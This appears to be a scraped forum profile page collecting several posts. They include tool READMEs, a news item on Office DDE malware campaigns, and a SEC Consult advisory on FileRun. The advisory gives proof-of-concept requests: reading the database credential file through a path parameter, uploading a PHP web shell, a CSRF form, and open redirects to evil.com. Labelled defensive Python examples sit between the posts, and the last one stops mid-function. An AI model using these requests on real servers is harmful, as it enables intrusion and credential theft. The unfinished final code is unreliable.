Fi8sVrs

Active Members
  • Content count: 2325
  • Days Won: 43

Fi8sVrs last won the day on October 20

Fi8sVrs had the most liked content!

Community Reputation: 1096 Excellent

1 Follower

About Fi8sVrs
  • Rank: Kamikaze

Recent Profile Visitors: 2713 profile views
  1. Baraiala Sunet (sound buzzing)

    Which Windows are you using? Which sound card? etc.
  2. qrenco.de

    Usage

    The service is used to generate QR-codes for strings in a UNIX/Linux console using curl/httpie/wget or similar tools. The service can be used in a browser also. Just add qrenco.de/ before the URL. The service uses libqrencode to generate QR-codes.

    Installation

    You don't need to install the service for using it (just try curl qrenco.de), but if you want to install it locally, do the following steps:

        $ git clone https://github.com/chubin/qrenco.de
        $ cd qrenco.de
        $ virtualenv ve
        $ ve/bin/pip install -r requirements.txt
        $ sudo apt-get install libqrenv
        $ ve/bin/python bin/srv.py

    If you want to use a HTTP-frontend for the service, configure it this way:

        server {
            listen 80;
            listen [::]:80;

            server_name qrenco.de *.qrenco.de;

            access_log /var/log/nginx/qrenco.de-access.log;
            error_log  /var/log/nginx/qrenco.de-error.log;

            location / {
                proxy_pass http://127.0.0.1:8003;

                proxy_set_header Host $host;
                proxy_set_header X-Real-IP $remote_addr;
                proxy_set_header X-Forwarded-For $remote_addr;

                client_max_body_size 10m;
                client_body_buffer_size 128k;
                proxy_connect_timeout 90;
                proxy_send_timeout 90;
                proxy_read_timeout 90;
                proxy_buffer_size 4k;
                proxy_buffers 4 32k;
                proxy_busy_buffers_size 64k;
                proxy_temp_file_write_size 64k;
                expires off;
            }
        }

    Download: grenco.de-master.zip or git clone https://github.com/chubin/qrenco.de.git

    Sources: http://qrenco.de/ https://github.com/chubin/qrenco.de
  3. Embed for asciinema

    I think an Embed for https://asciinema.org/ would be useful, especially in the Tutorials section.
  4. objection

    Runtime Mobile Exploration, powered by Frida.

    introduction

    objection is a runtime mobile exploration toolkit, powered by Frida. It was built with the aim of helping assess mobile applications and their security posture without the need for a jailbroken or rooted mobile device.

    The project's name quite literally explains the approach as well, whereby runtime specific objects are injected into a running process and executed using Frida.

    Note: This is not some form of jailbreak / root bypass. By using objection, you are still limited by all of the restrictions imposed by the applicable sandbox you are facing.

    features

    Supporting both iOS and Android and having new features and improvements added regularly as the tool is used in real world scenarios, the following is a short list of only a few key features:

    For all supported platforms, objection allows you to:
      • Patch iOS and Android applications, embedding a Frida gadget that can be used with objection or just Frida itself.
      • Interact with the filesystem, listing entries as well as upload & download files where permitted.
      • Perform various memory related tasks, such as listing loaded modules and their respective exports.
      • Attempt to bypass and simulate jailbroken or rooted environments.
      • Discover loaded classes and list their respective methods.
      • Perform common SSL pinning bypasses.
      • Dynamically dump arguments from methods called as you use the target application.
      • Interact with SQLite databases inline without the need to download the targeted database and use an external tool.
      • Execute custom Frida scripts.

    iOS specific features in objection include the ability to:
      • Dump the iOS keychain, and export it to a file.
      • Dump data from common storage such as NSUserDefaults and the shared NSHTTPCookieStorage.
      • Dump various formats of information in human readable forms.
      • Bypass certain forms of TouchID restrictions.
      • Watch for method executions by targeting all methods in a class, or just a single method.
      • Monitor the iOS pasteboard.
      • Dump encoded .plist files in a human readable format without relying on external parsers.

    Android specific features in objection include the ability to:
      • List the application's Activities, Services and Broadcast receivers.
      • Start arbitrary Activities available in the target application.
      • Watch a class method, reporting execution as it happens.

    screenshots

    The following screenshots show the main objection repl, connected to a test application on both an iPad running iOS 10.2.1, and a Samsung Galaxy S5 running Android 6.
      • A file system listing of the iOS application's main bundle
      • A file system listing of the Android application's bundle
      • iOS Keychain dumped for the current application, and later written to a file called keychain.json
      • Inline SQLite query tool
      • SSL Pinning bypass running for an iOS application
      • SSL Pinning bypass running for an Android application

    sample usage

    A sample session, where objection version 0.1 is used to explore the application's environment. Newer versions have the REPL prompt set to the current application's name, however usage has remained the same: https://asciinema.org/a/8O6fjDHOdVKgPYeqITHXPp6HV

    prerequisites

    To run objection, all you need is the python3 interpreter to be available. Installation via pip should take care of all of the dependencies needed. For more details, please see the prerequisites section on the project wiki.

    As for the target mobile applications though, for iOS, an unencrypted IPA is needed and for Android just the normal APK should be fine. If you have the source code of the iOS application you want to explore, then you can simply embed and load the FridaGadget.dylib from within the Xcode project.

    installation

    Installation is simply a matter of pip3 install objection. This will give you the objection command. For more detailed update and installation instructions, please refer to the wiki page here.

    license

    Objection is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License. Permissions beyond the scope of this license may be available at http://sensepost.com/contact/

    Download: objection-master.zip or git clone https://github.com/sensepost/objection.git

    Source: https://github.com/sensepost/objection
  5. A newly discovered, unpatched attack method that exploits a built-in feature of Microsoft Office is currently being used in various widespread malware attack campaigns.

    Last week we reported how hackers could leverage an old Microsoft Office feature called Dynamic Data Exchange (DDE) to perform malicious code execution on the targeted device without requiring Macros enabled or memory corruption.

    The DDE protocol is one of the several methods that Microsoft uses to allow two running applications to share the same data. The protocol is being used by thousands of apps, including MS Excel, MS Word, Quattro Pro, and Visual Basic for one-time data transfers and for continuous exchanges for sending updates to one another.

    The DDE exploitation technique displays no "security" warnings to victims, except asking them if they want to execute the application specified in the command—although this popup alert could also be eliminated "with proper syntax modification."

    Soon after the details of the DDE attack technique went public, Cisco's Talos threat research group published a report about an attack campaign actively exploiting this attack technique in the wild to target several organisations with a fileless remote access trojan (RAT) called DNSMessenger.

    Necurs Botnet Using DDE Attack to Spread Locky Ransomware

    Now, hackers have been found using the Necurs Botnet—malware that currently controls over 6 million infected computers worldwide and sends millions of emails—to distribute Locky ransomware and the TrickBot banking trojan using Word documents that leverage the newly discovered DDE attack technique, reported SANS ISC.

    Locky ransomware hackers previously relied on macros-based booby-trapped MS Office documents, but now they have updated the Necurs Botnet to deliver malware via the DDE exploit and gain the ability to take screenshots of the desktops of victims.

    Hancitor Malware Using DDE Attack

    Another separate malware spam campaign discovered by security researchers has also been found distributing Hancitor malware (also known as Chanitor and Tordal) using the Microsoft Office DDE exploit. Hancitor is a downloader that installs malicious payloads like Banking Trojans, data theft malware and Ransomware on infected machines and is usually delivered as a macro-enabled MS Office document in phishing emails.

    How to Protect Yourself From Word DDE Attacks?

    Since DDE is a legitimate Microsoft feature, most antivirus solutions do not flag any warning or block MS Office documents with DDE fields, nor does the tech company have any plans of issuing a patch that would remove its functionality.

    So, you can protect yourself and your organisation from such attacks by disabling the "update automatic links at open" option in the MS Office programs. To do so, open Word → select File → Options → Advanced and scroll down to General and then uncheck "Update Automatic links at Open."

    However, the best way to protect yourself from such attacks is always to be suspicious of any uninvited document sent via an email and never click on links inside those documents unless adequately verifying the source.

    Via thehackernews.com
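As an added example that is not part of the article above: a small Python scanner that opens a .docx and reports any field instruction containing DDE or DDEAUTO, which is where such documents carry the command the article describes and which, as the article notes, many antivirus products do not flag. It builds two constructed in-memory documents (one with a placeholder DDE field, one with an ordinary DATE field) so it runs offline; the placeholder program name and the document contents are constructed inputs, not samples from any campaign.

```python
# Added example (not from the article): flag DDE / DDEAUTO field codes in a
# .docx. A .docx is a zip archive of XML parts; Word stores field codes in
# word/document.xml (and headers, footers, notes) either as
#   <w:fldSimple w:instr="..."/>                          (simple field)
# or as <w:instrText> runs between <w:fldChar w:fldCharType="begin"/> and
# <w:fldChar w:fldCharType="end"/>                        (complex field).
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
DDE_RE = re.compile(r"\bDDE(AUTO)?\b", re.IGNORECASE)
# Parts of the archive that may carry field codes.
PART_RE = re.compile(r"^word/(document|header\d*|footer\d*|footnotes|endnotes)\.xml$")


def w(tag: str) -> str:
    """Fully qualified WordprocessingML name for ElementTree."""
    return "{%s}%s" % (W_NS, tag)


def field_codes(xml_bytes):
    """Yield every field instruction string in one WordprocessingML part."""
    root = ET.fromstring(xml_bytes)
    for fld in root.iter(w("fldSimple")):
        yield fld.get(w("instr"), "")
    # Complex fields: concatenate the instrText runs of each begin..end span so
    # an instruction split across runs ("DDE" + "AUTO ...") is seen whole.
    parts = []
    for el in root.iter():
        if el.tag == w("fldChar"):
            kind = el.get(w("fldCharType"))
            if kind == "begin":
                parts = []
            elif kind == "end" and parts:
                yield "".join(parts)
                parts = []
        elif el.tag == w("instrText"):
            parts.append(el.text or "")


def scan_docx(data: bytes):
    """Return [(part name, field code), ...] for every DDE field found."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not PART_RE.match(name):
                continue
            try:
                for code in field_codes(zf.read(name)):
                    if DDE_RE.search(code):
                        hits.append((name, " ".join(code.split())))
            except ET.ParseError:
                continue  # malformed part: no verdict from this part
    return hits


def build_docx(document_xml: str) -> bytes:
    """Constructed minimal .docx (in memory) for the demonstration."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", document_xml)
    return buf.getvalue()


# Constructed samples. The DDE instruction uses placeholder names, not a real
# command; a real document would name a program and its arguments there.
DDE_DOC = """<w:document xmlns:w="%s"><w:body><w:p>
<w:r><w:fldChar w:fldCharType="begin"/></w:r>
<w:r><w:instrText>DDE</w:instrText></w:r>
<w:r><w:instrText>AUTO "placeholder-program" "placeholder-arguments"</w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="separate"/></w:r>
<w:r><w:t>text shown in the document</w:t></w:r>
<w:r><w:fldChar w:fldCharType="end"/></w:r>
</w:p></w:body></w:document>""" % W_NS

CLEAN_DOC = """<w:document xmlns:w="%s"><w:body><w:p>
<w:fldSimple w:instr=" DATE \\@ &quot;d MMMM yyyy&quot; "><w:r><w:t>20 October 2017</w:t></w:r></w:fldSimple>
</w:p></w:body></w:document>""" % W_NS


if __name__ == "__main__":
    for label, doc in (("dde", DDE_DOC), ("clean", CLEAN_DOC)):
        print(label, scan_docx(build_docx(doc)))
```

The scanner reads field codes rather than searching the raw XML for the string "DDE" because Word may split one instruction across several instrText runs; joining the runs of each begin..end span is what makes the split form visible. Mail-gateway or endpoint checks built on the same idea should quarantine for review rather than silently drop, since legitimate documents can contain DDE links.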
  6. VPN trial 30 days

    Create a coupon here: https://stacksocial.com/sales/perfect-privacy-vpn-30-day-free-trial
    and add it here: https://www.perfect-privacy.com/german/coupon/?a_aid=stacksocial

    Offer ending in: 6 days. Enjoy!
  7. https://wellcode.ro/ - Learn programming from scratch

    Start learning at your own pace. Create a free account and learn to write quality code. We'll be there to help you when you need it.

    Content:
      • Introduction
      • C++ IDE
      • Tutorial for installing CodeBlocks
      • Hello world
      • Problem evaluation
      • Output
      • Variables
      • The integer data type
      • Assigning values
      • Reading variables from the keyboard
      • Printing variables
      • Operators
      • Addition
      • Calculation
      • Operators II
      • Like
      • If: the decision structure
      • Structure of the if statement
      • Compound conditions
      • FizzBuzz
      • Chained if
      • Else
      • Maximum
      • Else if
      • Ascending 3
      • Comments
      • While: repetitive structure I
      • While: how it works
      • Case study: number of digits of a number
      • ABC
      • Case study: concatenating two numbers
      • Reverse of a number
      • Chaining statements
      • Case study: checking whether a number is prime
      • Triangle
      • For: repetitive structure II
      • Minimum and maximum of N numbers
      • Multiplication
      • The x-th prime number
      • Arrays of numbers
      • Accessing and modifying array elements
      • Arrays of numbers: reading and printing
      • Modifying an array
      • Arrays of numbers: case study I
      • Adding an element to an array
      • Deleting an element from an array
      • Printing the even elements in reverse order
      • Printing even and odd elements
      • Sorting an array of numbers
      • Matrices: two-dimensional arrays
      • Real-life applications
      • Reading and printing matrices
      • Case study: transpose of a matrix
      • Deleting a row from a matrix
      • Deleting a column from a matrix
      • Square matrices
      • Traversing the diagonals of a square matrix
      • Arrays of numbers II
      • Frequency arrays
      • Binary search: the idea
      • Binary search: implementation
      • Bubble sort
      • Counting sort

    https://wellcode.ro/

    Source: ProTV
  8. Afian AB FileRun version 2017.03.18 suffers from cross site request forgery, cross site scripting, open redirection, remote shell upload, and various other vulnerabilities.

    SEC Consult Vulnerability Lab Security Advisory < 20171018-0 >
    =======================================================================
                  title: Multiple vulnerabilities
                product: Afian AB FileRun
     vulnerable version: 2017.03.18
          fixed version: 2017.09.18
                 impact: critical
               homepage: https://www.filerun.com | https://afian.se
                  found: 2017-08-28
                     by: Roman Ferdigg (Office Vienna)
                         SEC Consult Vulnerability Lab

                         An integrated part of SEC Consult
                         Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
                         Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

                         https://www.sec-consult.com
    =======================================================================

    Vendor description:
    -------------------
    "FileRun File Manager: access your files anywhere through self-hosted secure cloud storage, file backup and sharing for your photos, videos, files and more. Upload and download large files for easy sharing. Google Drive self-hosted alternative."

    Source: https://www.filerun.com

    Business recommendation:
    ------------------------
    By exploiting the vulnerabilities documented in this advisory, an attacker can compromise the web server which has FileRun installed. User files might get exposed through this attack.

    SEC Consult recommends not to use FileRun until a thorough security review has been performed by security professionals and all identified issues have been resolved.

    Vulnerability overview/description:
    -----------------------------------
    1) Path Manipulation
    When uploading, downloading or viewing files, FileRun uses a parameter to specify the path on the file-system. An attacker can manipulate the value of this parameter to read, create and even overwrite files in certain folders. An attacker could upload malicious files to compromise the webserver.

    In combination with the open redirect and CSRF vulnerability even an unauthenticated attacker can upload these files to get a shell. Through the shell all user files can be accessed.

    2) Stored Cross Site Scripting (XSS) via File Upload
    The application allows users to upload different file types. It is also possible to upload HTML files or to create them via the application's text editor. Files can be shared using a link or within the FileRun application (in the enterprise version). An attacker can inject JavaScript in HTML files to attack other users or simply create a phishing site to steal user credentials.

    Remark: In the standard configuration of the FileRun docker image the HttpOnly cookie flag is not set, which means that authentication cookies can be accessed in an XSS attack. This allows easy session hijacking as well.

    3) Cross Site Request Forgery (CSRF)
    The application does not implement CSRF protection. An attacker can exploit this vulnerability to execute arbitrary requests with the privileges of the victim. The only requirement is that a victim visits a malicious webpage. Such a page could be hosted on the FileRun server itself and shared with other users as described in vulnerability 2.

    Besides others, the following actions can be performed via CSRF if the victim has administrative privileges:
    - Create or delete users
    - Change permissions rights of users
    - Change user passwords

    If the victim has no administrative privileges, for example the following actions can be performed:
    - Upload files
    - Change the email address (for password recovery)

    4) Open Redirect Vulnerabilities
    An open redirect vulnerability in the login and logout pages allows an attacker to redirect users to arbitrary web sites. The redirection host could be used for phishing attacks (e.g. to steal user credentials) or for running browser exploits to infect a victim's machine with malware. The open redirect in the login page could also be used to exploit CSRF (see above).

    Because the server name in the manipulated link is identical to the original site, phishing attempts may have a more trustworthy appearance.

    Proof of concept:
    -----------------
    1) Path Manipulation
    The URL below is used to read the application file "autoconfig.php", which contains the username and cleartext password of the database.

    URL: http://$DOMAIN/?module=custom_actions&action=open_in_browser&path=/var/www/html/system/data/autoconfig.php

    This POST request is used to upload a PHP shell in the writable folder avatars:

    POST /?module=fileman_myfiles&section=ajax&page=up HTTP/1.1
    Host: $DOMAIN
    [...]
    Content-Type: multipart/form-data; boundary=---------------------------293712729522107
    Cookie: FileRunSID=t5h7lm99r1ff0quhsajcudh7t0; language=english
    DNT: 1
    Connection: close

    -----------------------------293712729522107
    Content-Disposition: form-data; name="flowTotalSize"

    150
    -----------------------------293712729522107
    Content-Disposition: form-data; name="flowIsFirstChunk"

    1
    -----------------------------293712729522107
    Content-Disposition: form-data; name="flowIsLastChunk"

    1
    -----------------------------293712729522107
    Content-Disposition: form-data; name="flowFilename"

    shell.php
    -----------------------------293712729522107
    Content-Disposition: form-data; name="path"

    /var/www/html/system/data/avatars/
    -----------------------------293712729522107
    Content-Disposition: form-data; name="file"; filename="shell.php"
    Content-Type: application/octet-stream

    *web shell payload here*
    -----------------------------293712729522107--

    To execute the uploaded shell a .htaccess file with the contents below can be uploaded in the same folder.

    Content of .htaccess file:
    <Files "*">
        Order allow,deny
        Allow from all
    </Files>

    The uploaded shell can be accessed by the following URL:
    http://$DOMAIN/?module=custom_actions&action=open_in_browser&path=/var/www/html/system/data/avatars/shell.php

    2) Stored Cross Site Scripting (XSS) via File Upload
    An HTML file with JavaScript code can be easily uploaded to attack other users. No PoC necessary.

    3) Cross Site Request Forgery
    An example for a CSRF attack would be the following request which changes the email address of the victim:

    <html>
      <body>
        <form action="http://$DOMAIN/?module=fileman&section=profile&action=save" method="POST">
          <input type="hidden" name="receive&#95;notifications" value="0" />
          <input type="hidden" name="two&#95;step&#95;enabled" value="0" />
          <input type="hidden" name="name" value="User" />
          <input type="hidden" name="name2" value="A" />
          <input type="hidden" name="email" value="newemail&#64;example&#46;com" />
          <input type="hidden" name="ext&#45;comp&#45;1009" value="on" />
          <input type="hidden" name="current&#95;password" value="" />
          <input type="hidden" name="new&#95;password" value="" />
          <input type="hidden" name="confirm&#95;new&#95;password" value="" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

    The new email address can be used by the attacker to reset the password of the victim.

    4) Open Redirect Vulnerabilities
    The URL below can be used to forward a user to an arbitrary website after the login:
    http://$DOMAIN/?redirectAfterLogin=aHR0cDovL3d3dy5ldmlsLmNvbQ==

    The value of the redirect parameter needs to be base64 encoded.

    To redirect a user after logout, the following URL can be used:
    http://$DOMAIN/?module=fileman&page=logout&redirect=http://evil.com

    In this case for a successful exploit, the victim has to be logged in.

    Vulnerable / tested versions:
    -----------------------------
    The regular version of FileRun 2017.03.18 has been tested. It is assumed earlier versions of FileRun are also vulnerable to the issues.

    Vendor contact timeline:
    ------------------------
    2017-08-31: Contacting vendor through info@afian.se, info@filerun.com
    2017-09-01: Sending unencrypted advisory as requested by vendor
    2017-09-04: FileRun fixed the vulnerability "Path Manipulation"
    2017-09-12: Requesting a status update
    2017-09-13: FileRun informed us that a patch for all vulnerabilities will be released before 2017-09-20
    2017-09-16: Patch available
    2017-10-18: Public release of security advisory

    Solution:
    ---------
    Update to the latest version available (see https://docs.filerun.com/updating). According to FileRun, all the vulnerabilities are fixed in release 2017.09.18 or higher.

    For further information see: https://www.filerun.com/changelog

    Workaround:
    -----------
    No workaround available.

    Advisory URL:
    -------------
    https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    SEC Consult Vulnerability Lab

    SEC Consult
    Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
    Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

    About SEC Consult Vulnerability Lab
    The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies.
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Interested to work with the experts of SEC Consult?
    Send us your application https://sec-consult.com/en/career/index.html

    Interested in improving your cyber security with the experts of SEC Consult?
    Contact our local offices https://sec-consult.com/en/contact/index.html
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Mail: research at sec-consult dot com
    Web: https://www.sec-consult.com
    Blog: http://blog.sec-consult.com
    Twitter: https://twitter.com/sec_consult

    EOF Roman Ferdigg / @2017

    Site sec-consult.com
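Added example, not FileRun's code and not from the advisory: Python versions of the three server-side checks whose absence the advisory above describes (findings 1, 3 and 4): confining a client-supplied path to the user's storage root, validating the post-login redirect (including the base64-encoded form the redirectAfterLogin parameter used), and verifying a per-session CSRF token. The storage root, the allowed host name and the function names are assumptions made for the demonstration.

```python
# Added example (not FileRun's code): the server-side checks whose absence the
# advisory describes. Root directory, host names and function names are
# assumptions for the demonstration.
import base64
import binascii
import hmac
import os
import secrets
from typing import Optional, Set
from urllib.parse import urlsplit

# Assumed per-user storage root; a real deployment derives it from the session.
USER_ROOT = "/srv/filerun/users/alice"
# Hosts this application serves; redirects may only land on these (assumed).
ALLOWED_HOSTS = {"files.example.com"}


def resolve_under_root(root: str, user_path: str) -> Optional[str]:
    """Finding 1: map a client-supplied ``path`` onto a file inside ``root``.

    Returns the resolved absolute path, or None when the request names an
    absolute path (``/var/www/html/system/data/autoconfig.php``) or climbs out
    of ``root`` with ``..``. realpath() collapses ``..`` and symlinks before
    the containment test, so the comparison is on the final location.
    """
    if not user_path or user_path.startswith(("/", "\\")) or os.path.isabs(user_path):
        return None
    root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root, user_path))
    if candidate == root or candidate.startswith(root + os.sep):
        return candidate
    return None


def decode_redirect_param(value: str) -> Optional[str]:
    """Finding 4: the login page carried the target base64-encoded in
    ``redirectAfterLogin``; decode it, rejecting malformed input."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def safe_redirect(target: Optional[str], allowed_hosts: Set[str], default: str = "/") -> str:
    """Return ``target`` only if it stays on this site; otherwise ``default``.

    Accepts site-local paths (``/dashboard``) and http(s) URLs whose host is in
    ``allowed_hosts``. Rejects other schemes, foreign hosts, and the
    scheme-relative forms ``//other.host`` and ``/\\other.host``.
    """
    if not target:
        return default
    target = target.strip().replace("\\", "/")
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        if parts.scheme in ("http", "https") and parts.hostname in allowed_hosts:
            return target
        return default
    if target.startswith("/") and not target.startswith("//"):
        return target
    return default


def issue_csrf_token() -> str:
    """Finding 3: per-session secret the server stores and embeds in its forms."""
    return secrets.token_urlsafe(32)


def csrf_token_valid(session_token: Optional[str], submitted: Optional[str]) -> bool:
    """A cross-site form (like the advisory's profile-save POST) cannot supply
    the session's token, so its request is refused; comparison is constant-time."""
    if not session_token or not submitted:
        return False
    return hmac.compare_digest(session_token, submitted)


if __name__ == "__main__":
    print(resolve_under_root(USER_ROOT, "docs/report.pdf"))
    print(resolve_under_root(USER_ROOT, "/var/www/html/system/data/autoconfig.php"))
    print(safe_redirect(decode_redirect_param("aHR0cDovL3d3dy5ldmlsLmNvbQ=="), ALLOWED_HOSTS))
```

The path check rejects absolute input outright instead of silently re-rooting it, so a request like the advisory's autoconfig.php read fails closed and is visible in the logs; the redirect check decodes first and validates the decoded value, since validating the encoded string would pass anything. The CSRF token must be tied to the session and compared with a constant-time function; checking the Referer header alone is not a substitute.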
  9. A suite of utilities simplifying Linux networking stack performance troubleshooting and tuning. https://pypi.python.org/pypi/netutils-linux

    netutils-linux

    It's a useful set of utils to simplify Linux network troubleshooting and performance tuning, developed in order to help Carbon Reductor techsupport and automate the whole Linux performance tuning process out of the box (ok, except the best RSS layout detection with multiple network devices). These utils may be useful for datacenters and internet service providers with heavy network workload (you probably wouldn't see an effect at your desktop computer). It's now in production usage with 300+ deployments and saves us a lot of time with hardware and software settings debugging. Inspired by packagecloud's blog post.

    Installation

    You'll need pip.

        pip install netutils-linux

    Utils

    Monitoring

    All these top-like utils don't require root privileges or sudo usage. So you can install and use them as a non-privileged user if you care about security.

        pip install --user netutils-linux

    Brief explanation about highlighting colors for CPU and device groups: green and red are for NUMA-nodes, blue and yellow for CPU sockets. Screenshots are taken from different hosts with different hardware.

    network-top

    Most useful util in this repo that includes almost all Linux network stack performance metrics and allows you to monitor interrupts, soft interrupts, and network processing statistics for devices and CPUs. Based on the following files:
      • /proc/interrupts (vectors with a small amount of irqs/second are hidden by default)
      • /proc/net/softnet_stat - packet distribution and errors/squeeze rate between CPUs.
      • /proc/softirqs (only NET_RX and NET_TX values).
      • /sys/class/net/<NET_DEVICE>/statistic/<METRIC> files (you can specify units, mbits are default)

    There are also separate utils if you want to look at only specific metrics: irqtop, softirq-top, softnet-stat-top, link-rate.

    snmptop

    Basic /proc/net/snmp file watcher.

    Tuning

    rss-ladder

    Automatically sets smp_affinity_list for the IRQs of NIC rx/tx queues (which usually all work on CPU0 out of the box). Based on lscpu's output. It also supports double/quad ladder in case of multiprocessor systems (but you'd better explicitly specify queue count == cores per socket as the NIC driver's param).

    Example output:

        # rss-ladder eth1
        - distributing interrupts of eth1 (-TxRx-) on socket 0
          - eth1: irq 67 eth1-TxRx-0 -> 0
          - eth1: irq 68 eth1-TxRx-1 -> 1
          - eth1: irq 69 eth1-TxRx-2 -> 2
          - eth1: irq 70 eth1-TxRx-3 -> 3
          - eth1: irq 71 eth1-TxRx-4 -> 8
          - eth1: irq 72 eth1-TxRx-5 -> 9
          - eth1: irq 73 eth1-TxRx-6 -> 10
          - eth1: irq 74 eth1-TxRx-7 -> 11

    autorps

    Enables RPS on all available CPUs of the NUMA node local to the NIC, for all of the NIC's rx queues. It may be good for small servers with cheap network cards. You can also explicitly pass --cpus or --cpu-mask.

    Example output:

        # autorps eth0
        Using mask 'fc0' for eth0-rx-0.

    maximize-cpu-freq

    Sets every CPU scaling governor mode to performance and sets the max scaling value as the min scaling value. So you will be able to use all the power of your processor (useful for latency sensitive systems).

    rx-buffers-increase

    A util that finds and sets a compromise value between avoiding dropped/missing packets and keeping latency low.

    Example output:

        # ethtool -g eth1
        Ring parameters for eth1:
        Pre-set maximums:
        RX: 4096
        ...
        Current hardware settings:
        RX: 256

        # rx-buffers-increase eth1
        run: ethtool -G eth1 rx 2048

        # rx-buffers-increase eth1
        eth1's rx ring buffer already has fine size.

        # ethtool -g eth1
        Ring parameters for eth1:
        Pre-set maximums:
        RX: 4096
        ...
        Current hardware settings:
        RX: 2048

    Hardware and its configuration rating

    server-info

    Much alike lshw but designed for the network processing role of a server.

        # server-info show
        cpu:
          info:
            Architecture: x86_64
            BogoMIPS: 6799.9899999999998
            Byte Order: Little Endian
            CPU MHz: 3399.998
            CPU family: 6
            CPU op-mode(s): 32-bit, 64-bit
            CPU(s): 2
            Core(s) per socket: 1
            Hypervisor vendor: KVM
            L1d cache: 32K
            L1i cache: 32K
            L2 cache: 4096K
            Model: 13
            Model name: QEMU Virtual CPU version (cpu64-rhel6)
            NUMA node(s): 1
            NUMA node0 CPU(s): 0,1
            On-line CPU(s) list: 0,1
            Socket(s): 2
            Stepping: 3
            Thread(s) per core: 1
            Vendor ID: GenuineIntel
            Virtualization type: full
          layout:
            '0': '0'
            '1': '1'
        disk:
          sr0:
            model: QEMU DVD-ROM
          vda:
            model: null
            size: 64424509440
            type: HDD
        memory:
          MemFree: 158932
          MemTotal: 1922096
          SwapFree: 4128764
          SwapTotal: 4128764
        net:
          eth1:
            buffers:
              cur: 2048
              max: 4096
            conf:
              ip: 10.144.63.1/24
              vlan: true
            driver:
              driver: e1000
              version: 7.3.21-k8-NAPI
            queues:
              own: []
              rx: []
              rxtx: []
              shared:
              - virtio1, eth0, eth1
              tx: []
              unknown: []

    It can also rate hardware and its features in a range of 1..10.

        # server-info rate
        cpu:
          BogoMIPS: 7
          CPU MHz: 7
          CPU(s): 1
          Core(s) per socket: 1
          L3 cache: 1
          Socket(s): 10
          Thread(s) per core: 10
          Vendor ID: 10
        disk:
          sr0:
            size: 1
            type: 2
          vda:
            size: 1
            type: 1
        memory:
          MemTotal: 1
          SwapTotal: 10
        net:
          eth1:
            buffers:
              cur: 5
              max: 10
            driver: 1
            queues: 1
        system:
          Hypervisor vendor: 1
          Virtualization type: 1

    Download: netutils-linux-master.zip or: git clone https://github.com/strizhechenko/netutils-linux.git

    Source: https://github.com/strizhechenko/netutils-linux
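Added example, not part of netutils-linux: a Python parser for /proc/net/softnet_stat, the file network-top and softnet-stat-top read for the per-CPU packet distribution and the drop/squeeze counters described above. It computes rates between two samples and flags both the CPUs that lost packets and the "everything lands on CPU0" imbalance that rss-ladder and autorps are meant to fix. The two samples are constructed, not captured from a real host; the column layout follows the kernel's softnet_seq_show() (processed, dropped, time_squeeze, zero padding, then received_rps at index 9), and the function names are my own.

```python
# Added example (not part of netutils-linux): parse /proc/net/softnet_stat the
# way network-top / softnet-stat-top consume it and turn two samples into
# per-CPU rates. One line per CPU, 8-hex-digit columns; per the kernel's
# softnet_seq_show(): 0 processed, 1 dropped, 2 time_squeeze, 3..8 zero
# padding (historical fields), 9 received_rps, 10 flow_limit_count.
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class SoftnetCounters:
    cpu: int
    processed: int      # packets handled in net_rx_action on this CPU
    dropped: int        # packets dropped because the backlog queue was full
    time_squeeze: int   # net_rx_action ran out of budget/time with work left
    received_rps: int   # packets steered to this CPU by RPS


def parse_softnet_stat(text: str) -> List[SoftnetCounters]:
    """Parse the file contents; the line index is the CPU number."""
    rows = []
    lines = [ln for ln in text.splitlines() if ln.strip()]
    for cpu, line in enumerate(lines):
        f = [int(col, 16) for col in line.split()]
        rps = f[9] if len(f) > 9 else 0   # older kernels print fewer columns
        rows.append(SoftnetCounters(cpu, f[0], f[1], f[2], rps))
    return rows


def rates(before: List[SoftnetCounters], after: List[SoftnetCounters],
          interval_s: float = 1.0) -> Dict[int, Dict[str, float]]:
    """Per-CPU counter deltas per second between two samples."""
    out = {}
    for b, a in zip(before, after):
        out[a.cpu] = {
            "pps": (a.processed - b.processed) / interval_s,
            "drops_ps": (a.dropped - b.dropped) / interval_s,
            "squeeze_ps": (a.time_squeeze - b.time_squeeze) / interval_s,
            "rps_ps": (a.received_rps - b.received_rps) / interval_s,
        }
    return out


def problem_cpus(rate_map: Dict[int, Dict[str, float]]) -> List[int]:
    """CPUs that dropped or squeezed packets in the interval: the cells
    softnet-stat-top highlights. Drops point at a backlog that is too small,
    squeezes at a netdev_budget the CPU cannot keep up with."""
    return sorted(c for c, r in rate_map.items()
                  if r["drops_ps"] > 0 or r["squeeze_ps"] > 0)


def hot_cpus(rate_map: Dict[int, Dict[str, float]], factor: float = 1.5) -> List[int]:
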